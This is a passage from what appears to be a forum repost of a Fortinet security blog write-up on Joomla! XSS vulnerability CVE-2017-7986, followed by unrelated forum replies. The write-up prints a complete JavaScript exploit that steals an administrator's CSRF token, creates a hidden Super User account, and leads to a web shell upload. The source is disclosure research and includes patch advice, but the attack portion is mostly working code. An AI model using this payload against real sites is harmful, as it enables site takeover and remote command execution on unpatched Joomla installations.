could bypass the XSS filter in an HTML tag by changing the script from to , because the is the mark “:” in HTML format. The attacker could then trigger this script code by adding a tag. For example, the attacker can insert the following code in an article , as shown in Figure 6. Figure 6. Insert the PoC for CVE-2017-7986 When victims access the post, regardless of whether it’s published or not, and click the “Click Me” button, the inserted XSS code will be triggered in both the main page and the administrator page, as shown in Figures 7 and 8. Figure 7. CVE-2017-7986 PoC triggered in home page Figure 8. CVE-2017-7986 PoC triggered in administrator page Exploit Here I provide an exploit example for CVE-2017-7986 that allows an attacker with a low permission account to create a Super User account and upload a web shell. To achieve this, I will write a small piece of JavaScript code for creating a Super User account by using the site administrator’s permission. It first obtains the CSRF token from the user edit page , and then posts the Super User account creation request to the server with the stolen CSRF token. The new Super User will be ‘Fortinet Yzy’ with the password ‘test’. var request = new XMLHttpRequest(); var req = new XMLHttpRequest(); var id = ''; var boundary = Math.random().toString().substr(2); var space = "-----------------------------"; request.open('GET', 'index.php?option=com_users&view=user&layout=edit', true); request.onload = function() { if (request.status >= 200 && request.status < 400) { var resp = request.responseText; var myRegex = /<input type="hidden" name="([a-z0-9]+)" value="1" \/>/; id = myRegex.exec(resp)[1]; req.open('POST', 'index.php?option=com_users&layout=edit&id=0', true); req.setRequestHeader("content-type", "multipart/form-data; boundary=---------------------------" + boundary); var multipart = space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[name]\"" + "\r\n\r\nFortinet Yzy\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[username]\"" + "\r\n\r\nfortinetyzy\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[password]\"" + "\r\n\r\ntest\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[password2]\"" + "\r\n\r\ntest\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[email]\"" + "\r\n\r\nzyg@gmail.com\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[registerDate]\"" + "\r\n\r\n\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[lastvisitDate]\"" + "\r\n\r\n\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[lastResetTime]\"" + "\r\n\r\n\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[resetCount]\"" + "\r\n\r\n0\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[sendEmail]\"" + "\r\n\r\n0\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[block]\"" + "\r\n\r\n0\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[requireReset]\"" + "\r\n\r\n0\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[id]\"" + "\r\n\r\n0\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[groups][]\"" + "\r\n\r\n8\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[params][admin_style]\"" + "\r\n\r\n\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[params][admin_language]\"" + "\r\n\r\n\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[params][language]\"" + "\r\n\r\n\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[params][editor]\"" + "\r\n\r\n\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[params][helpsite]\"" + "\r\n\r\n\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[params][timezone]\"" + "\r\n\r\n\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"task\"" + "\r\n\r\nuser.apply\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"" + id + "\"" + "\r\n\r\n1\r\n" + space + boundary + "--\r\n"; req.onload = function() { if (req.status >= 200 && req.status < 400) { var resp = req.responseText; console.log(resp); } }; req.send(multipart); } }; request.send(); An attacker can add this code to Joomla! by exploiting this XSS vulnerability, as shown in Figure 9. Figure 9. Adding XSS code Once the site administrator triggers this XSS attack in the administrator page, a Super User account will be immediately created, as shown in Figures 10 and 11. Figure 10. Site administrator triggers the XSS attack in the administrator page Figure 11. A new Super User account is created by the attacker The attacker can then login to Joomla! using this new Super User permission and upload a web shell by installing a plugin, as shown in Figures 12 and 13. Figure 12. Uploading a web shell using the attacker’s Super User account Figure 13. Attacker accesses the web shell and executes commands Solution All users of Joomla! should upgrade to the latest version immediately. Additionally, organizations that have deployed Fortinet IPS solutions are already protected from these vulnerabilities with the signatures Joomla!.Core.Article.Post.Colon.Char.XSS and Joomla!.Core.Article.Post.Quote.Char.XSS. by Zhouyuan Yang | May 04, 2017 | Filed in: Security Research Sursa: https://blog.fortinet.com/2017/05/04/multiple-joomla-core-xss-vulnerabilities-are-discovered
    1 point
  17. https://discord.gg/SMTh94H Pentru cei care nu stiu unde sa intre, invitatia e permanenta. PS. Nu fiti animale ca va ard.
    1 point
  18. 1 point
  19. SI ce vrei sa faci mai departe? Si ce vrei sa inveti? Si de ce RST? Forumul asta e cunoscut pentru multe: securitate, panarama, carding, SEO, exploits, programare etc. . Din astea ce te intereseaza pe tine? Bafta!
    1 point
×
×
  • Create New...